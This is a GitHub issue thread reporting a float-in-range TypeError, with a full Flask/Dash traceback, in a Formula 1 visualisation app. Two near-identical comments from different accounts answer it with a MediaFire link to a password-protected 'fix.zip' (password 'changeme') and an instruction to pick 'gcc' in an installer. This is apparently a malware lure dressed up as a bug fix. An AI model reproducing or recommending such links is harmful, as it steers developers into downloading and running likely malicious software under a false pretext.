### ISSUE TITLE
Fixes using float value in range construction

### ISSUE THREAD

**Issue by Casper-Guo** [Casper-Guo/Armchair-Strategist#97]
Revealed by the following traceback:

```
ERROR   app.py  Exception on /_dash-update-component [POST]
Traceback (most recent call last):
  File "/home/robery/Armchair-Strategist/env/lib/python3.10/site-packages/flask/app.py", line 1473, in wsgi_app
    response = self.full_dispatch_request()
  File "/home/robery/Armchair-Strategist/env/lib/python3.10/site-packages/flask/app.py", line 882, in full_dispatch_request
    rv = self.handle_user_exception(e)
  File "/home/robery/Armchair-Strategist/env/lib/python3.10/site-packages/flask/app.py", line 880, in full_dispatch_request
    rv = self.dispatch_request()
  File "/home/robery/Armchair-Strategist/env/lib/python3.10/site-packages/flask/app.py", line 865, in dispatch_request
    return self.ensure_sync(self.view_functions[rule.endpoint])(**view_args)  # type: ignore[no-any-return]
  File "/home/robery/Armchair-Strategist/env/lib/python3.10/site-packages/dash/dash.py", line 1373, in dispatch
    ctx.run(
  File "/home/robery/Armchair-Strategist/env/lib/python3.10/site-packages/dash/_callback.py", line 465, in add_context
    output_value = _invoke_callback(func, *func_args, **func_kwargs)
  File "/home/robery/Armchair-Strategist/env/lib/python3.10/site-packages/dash/_callback.py", line 40, in _invoke_callback
    return func(*args, **kwargs)  # %% callback invoked %%
  File "/home/robery/Armchair-Strategist/app.py", line 440, in render_lineplot
    fig = pg.stats_lineplot(included_laps, drivers, y, upper_bound)
  File "/home/robery/Armchair-Strategist/f1_visualization/plotly_dash/graphs.py", line 234, in stats_lineplot
    "tickvals": list(range(5, num_laps, 5)),
TypeError: 'float' object cannot be interpreted as an integer
```

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Qsgz2023ji5ban** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
